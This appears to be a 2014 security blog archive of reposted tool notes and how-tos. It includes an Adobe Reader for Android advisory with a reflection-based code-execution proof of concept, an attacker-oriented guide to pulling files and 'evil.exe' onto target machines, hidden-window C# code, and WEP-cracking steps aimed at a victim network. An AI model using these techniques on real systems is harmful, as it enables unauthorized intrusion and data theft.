Jun 20, 2014

Tools: Zeppoo - Rootkits on Linux

Zeppoo allows you to detect rootkits on i386 and x86_64 architecture under Linux, by using /dev/kmem and /dev/mem. Moreover it can also detect hidden tasks, connections, corrupted symbols, system calls... and so many other things.

Source: http://sourceforge.net/projects/zeppoo/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 19, 2014

Howto: Fix error code 1603 in Windows

Cause
You are trying to install a program into an encrypted folder.

Fix

If you use the Encrypted File System (EFS) or other third-party encryption software that has encrypted the destination folder or a folder above it (but not the entire volume) either decrypt the folder, or select a different folder that is not encrypted.

Cause

You are trying to install a program to a folder on a drive letter that is actually a substitute drive.

Fix

Select the actual physical path for the install, rather than the path through the substitute drive letter.

Cause

The SYSTEM account needs Full Control permission to the destination folder, and does not have that.

Fix

Remove the ACL that is blocking inheritance for SYSTEM, or grant SYSTEM the Full Control permission explicitly to the destination folder.

Cause

A file to be replaced is in use by another program.

Fix

Close all open programs, and ensure that they are truly closed by checking Task Manager. You may instead choose to reboot or even perform a clean boot if necessary to prevent any background programs from running and locking a needed file.

Cause

A previous install or uninstall has not completed, or failed.

Fix

Complete the install or uninstall. You may need to reboot to do so. If you still cannot uninstall or complete the install of the other program, consult their support site for steps to manually remove the program, including folders and files to remove and registry keys to delete.

Cause

Required updates are missing.

Fix

Run Windows Update to install any missing updates or patches. Reboot after completion before attempting the install again.

Cause

The registry contains dead/bad links.

Fix

Consult the vendor’s support documentation for the registry keys used by the software. Reset these to default or delete them if appropriate before trying to install the software again.
Error 1603 can completely stop you from installing a new software package, but only for as long as the root cause still exists. If it is one of the probable causes lists above, it won’t take you long to get past that, and on your way to using your new program.



Source: http://www.gfi.com/blog/how-to-solve-error-code-1603/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wireless Network Watcher - Show who is connected to your wireless network

Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all and devices that are currently connected to your network.
For every or device that is connected to your network, the following information is displayed: IP address, address, the company that manufactured the network , and optionally the computer name.
You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Volatility Plugin - OpenVPN credentials extractor

This repository contains a plugin for Volatility that can extract credentials from the memory of an OpenVPN process. The username and password entered by the user, as well as passwords entered to unlock a private key can be recovered. The --auth-nocache flag must not be set. Currently only OpenVPN 2.2.2 on Windows is supported.
This repository also contains a small plugin to extract base64/PEM encoded RSA private keys from memory.

Installation

Either place the plugins into Volatility's plugins/ directory, or use the --plugins= option to tell Volatility where to look for plugins.

Usage

The plugins expect no further arguments, just load a memory image and specify a profile for Volatility:
./vol.py -f memory_dump.elf --profile=WinXPSP3x86 openvpn 
 
Source: https://github.com/Phaeilo/vol-openvpn 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Nosql-Exploitation-Framework

A FrameWork For NoSQL Scanning and Exploitation Framework
NoSQL Exploitation Framework 1.0 Released

Author

  • NoSQL Exploitation Framework Authored By Francis Alexander

Added Features:

  • First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
  • Support For NoSQL WebAPPS
  • Added payload list for JS Injection,Web application Enumeration.
  • Scan Support for Mongo,CouchDB and Redis
  • Dictionary Attack Support for Mongo,Cocuh and Redis
  • Enumeration Module added for the DB's,retrieves data in db's @ one shot.
  • Currently Discover's Web Interface for Mongo
  • Shodan Query Feature
  • MultiThreaded IP List Scanner
  • Dump and Copy Database features Added for CouchDB
  • Sniff for Mongo,Couch and Redis

Installation

  • Run chmod+x install.sh nosqlmap.py
  • ./install.sh
  • nosqlexp.py -h (For Help Options)

Sample Usage

  • nosqlexp.py -ip localhost -scan
  • nosqlexp.py -ip localhost -dict mongo -file b.txt
  • nosqlexp.py -ip localhost -enum couch
  • nosqlexp.py -ip localhost -enum redis
  • nosqlexp.py -ip localhost -clone couch
  • nosqlexp.py -ip localhost -webapp "web_app_link"
Source: https://github.com/torque59/Nosql-Exploitation-Framework

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 18, 2014

Tools: Ghost Phisher - Wireless and Ethernet security auditing and attack software program

Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks.

Operating System Supported

The Software runs on any Linux machine with the programs prerequisites, But the program has been tested on the following Linux based operating systems:

Prerequisites

The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on Debian based systems using "apt-get install program" or otherwise downloaded and installed manually
 Source: https://code.google.com/p/ghost-phisher/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Sigram - Telegram client on Linux Desktop

Telegram is a free messaging app that focuses on speed and security, at least that's what its developers say. There are official Telegram applications available for iOS and Android as well as various unofficial clients for Windows, Mac OS X and Windows Phone.

Sigram is a native, open source Telegram client for Linux desktops, written in C++, C, Qt, QML.
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Adobe Reader for Android exposes insecure Javascript interfaces

------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.

http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:

- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.

------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.

public class ARJavaScript
{
[...]

    public ARJavaScript(ARViewerActivity paramARViewerActivity)
    {
[...]
this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this),
"_adobereader");
        this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
        this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), "_escriptString");
        this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
"_event");
        this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
"_field");
        this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
    }

An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.

function execute(bridge, cmd) {
    return bridge.getClass().forName('java.lang.Runtime')
        .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}

if(window._app) {
    try {
        var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > '
+ path]);
        window._app.alert(path + ' created', 3);
    } catch(e) {
        window._app.alert(e, 0);
    }
}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3] http://developer.android.com/reference/android/webkit/JavascriptInterface.html [4] http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf
 
Source: http://seclists.org/fulldisclosure/2014/Apr/192 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 17, 2014

Tools: HackPorts - Mac OS X Penetration Testing Framework and Tools

HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a ‘super-project’ that leverages existing code porting efforts, security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines.

Source:  http://buddhalabs.com/hackports/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: 15 ways to download files from internet

The source of this post is https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file

PowerShell File Download

PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")
To execute this script, run the following command in a PowerShell window:
PS C:\> .\test.ps1
Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:
C:\>powershell set-executionpolicy unrestricted

Visual Basic File Download

The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one.
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2 '
end with
Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above.
To execute this script, run the following command in a command shell:
C:\>cscript test.vbs
The following four languages are non-native to windows machines. However, if you find a machine with any of these languages installed on them (regardless of the OS), you can leverage these scripts to download files.

Perl File Download

Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host.
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
To execute this script, run the following command in a command shell:
root@kali:~# perl test.pl

Python File Download

Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task.
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
To execute this script, run the following command in a command shell:
root@kali:~# python test.py

Ruby File Download

Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files.
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
To execute this script, run the following command in a command shell:
root@kali:~# ruby test.rb

PHP File Download

PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language.
#!/usr/bin/php
<?php
        $data = @file("http://example.com/file");
        $lf = "local_file";
        $fh = fopen($lf, 'w');
        fwrite($fh, $data[0]);
        fclose($fh);
?>
To execute this script, run the following command in a command shell:
root@kali:~# php test.php
The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions.

FTP File Download

For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps ran without the need for interaction.
ftp 127.0.0.1
username
password
get file
exit

TFTP File Download

Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command:
tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

Bitsadmin File Download

Bitsadmin is a command-line tool for windows that allows a user to create download or upload tasks.
bitsadmin /transfer n http://domain/file c:\%homepath%\file

Wget File Download

Wget is a Linux and Windows tool that allows for non-interactive downloads.
wget http://example.com/file

Netcat File Download

Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific.
On the attackers computer, type:
cat file | nc -l 1234
This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP.
The following command should be run on the machine the attacker is targeting:
nc host_ip 1234 > file
This will connect the target to the attacker's computer and receive the file that will be sent over the connection.

Windows Share File Download

Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands.
To mount a remote drive, type:
net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Notepad Dialog Box File Download

If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal.
  1. Open notepad
  2. Go to file - open
  3. In the File Name box near the bottom, type in the full URL path to your file

Exe to Txt, and Txt to Exe with PowerShell and Nishang

This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here.
To convert the exe to a hex file, type:
PS > .\ExetoText.ps1 evil.exe evil.txt
Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang.
To convert the hex file back to an exe, type:
PS > .\TexttoExe.ps1 evil.text evil.exe
This will result in your evil exe being successfully moved to the target machine.

Csc.exe to Compile Source from a File

C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity.
The default location for this executable is the following:
C:\Windows\Microsoft.NET\Framework\version
Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code.
public class Evil
{
   public static void Main()
   {
      System.Diagnostics.Process process = new System.Diagnostics.Process();
   System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
   startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
   startInfo.FileName = "cmd.exe";
   startInfo.Arguments = "/C net users > C:\\Temp\\users.txt";
   process.StartInfo = startInfo;
   process.Start();
   }
}
To compile your source code, type:
csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs


Source: https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Python Memory Management Series

http://hbfs.wordpress.com/2013/01/01/python-memory-management-part-i/
http://hbfs.wordpress.com/2013/01/08/python-memory-management-part-ii/ 

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Website for Java Exploit

This site is the hub of Java Exploit. Try it
http://java-exploit.com/ 

 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Hack Wireless WEP with aircrack-ng


1. airmon-ng stop [your interface] [My is wlan0]
2. airodump-ng [your interface] [My is wlan0]
3. airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface] [My is wlan0]
4. Open new terminal: aireplay-ng -1 0 -a [Victrim BSSID] [your interface] [My is wlan0]
5. Continue to packet sniffing.
6. Open new terminal: aireplay-ng -3 -b [Victim BSSID] [your interface] [My is wlan0]  <===  To create high data traffic            
7. Open new terminal: aircrack-ng wep-01.cap
**Attention Wait to collect 5000 packets and start Aircrack-ng attack**


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Root Samsung Galaxy S5 with Geohot's Tool (Using CVE-2014-3153)


  1. download towelroot v 1 from http://towelroot.com/.
  2. Make it sure you have checked that option in the Settings which allows to install third-party applications from unknown sources.
  3. After the app has been installed, run it from the applications page.
  4. Install SuperSU from Google Play Store or download from
    download.chainfire.eu/447/SuperSU/UPDATE-SuperSU-v1.99r4.zip



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Circle City Con 2014 Videos


http://www.irongeek.com/i.php?page=videos/circlecitycon2014/mainlist

Track1

Conference Opening
Keynote - Beau Woods
Containing Privileged Processes with SELinux and PaX and Attacking Hardened Systems - Parker Schmitt
Whitelist is the New Black - Damian Profancik
Developing a Open Source Threat Intelligence Program - Edward McCabe
Blurred Lines- When Digital Attacks Get Physical - Phil Grimes
Hackers, Attack Anatomy and Security Trends - Ted Harrington
Exploring the Target Exfiltration Malware with Sandbox Tools - Adam Hogan


Day 2

From Grunt to Operator – Tom Gorup
Moving the Industry Forward – The Purple Team - David Kennedy
Software Assurance Marketplace (SWAMP) - Von Welch
OWASP Top 10 of 2013- It’s Still a Thing and We’re Still Not Getting It - Barry Schatz
Tape Loops for Industrial Control Protocols - K. Reid Wightman
OpenAppID- Open Source Next Gen Firewall with Snort - Adam Hogan
Challenge of Natural Security Systems - Rockie Brockway
InfoSec Big Joke – 3rd Party Assessments - Moey (Not recorded)
How to create an attack path threat model - Wolfgang Goerlich

Day 3

Are You a Janitor or a Cleaner - John Stauffacher / Matt Hoy
Ain’t No Half-Steppin’ - Martin Bos
Closing Announcements
Track 2 Competitive Hacking- why you should capture the flag - Steve Vittitoe
3 Is a Magic Number (or your Reality Check is About to Bounce) - Edward McCabe
The TrueCrypt audit- How it happened and what we found - Kenneth White
Seeing Purple- Hybrid Security Teams for the Enterprise - Mark Kikta (Beltface)
Eyes on IZON- Surveilling IP Camera Security - Mark Stanislav
Cognitive Bias and Critical Thinking in Open Source Intelligence (OSINT) - Benjamin Brown

Day 2

Hackers Are People Too - Amanda Berlin
gitDigger- Creating useful wordlists and hashes from GitHub repositories - Jaime Filson
Retrocomputing And You – Machines that made the ‘net - Pete Friedman
Doge Safes- Very Electronic, Much Fail, WOW! - Jeff Popio
Human Trafficking in the Digital Age - Chris Jenks
Keys That Go *Bump* In The Night - Loak
How Hackers for Charity (Possibly) Saved Me a LOT of Money - Branden Miller & Emily Miller
Ten Commandments of Incident Response (For Hackers) - Lesley Carhart
Threat Modeling- Fear, Fun, and Operational - James Robinson
Decrypting Communication- Getting Your Point Across to the Masses - Katherine Cook Frye
How often should you perform a Penetration Test - Jason Samide
Proactive Defense – Eliminating the Low Hanging Fruit - Matt Kelly
Active Directory- Real Defense for Domain Admins - Jason Lang

Day 3

Profiling Campus Crime - Chris J., Jason J., Katelyn C.,Alex H.
Proper Seasoning Improves Taste - James Siegel
Executive Management Manaing the Executives Beau Woods & Engaging the Media API Steve Ragan


Source: http://www.irongeek.com/i.php?page=videos/circlecitycon2014/mainlist


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.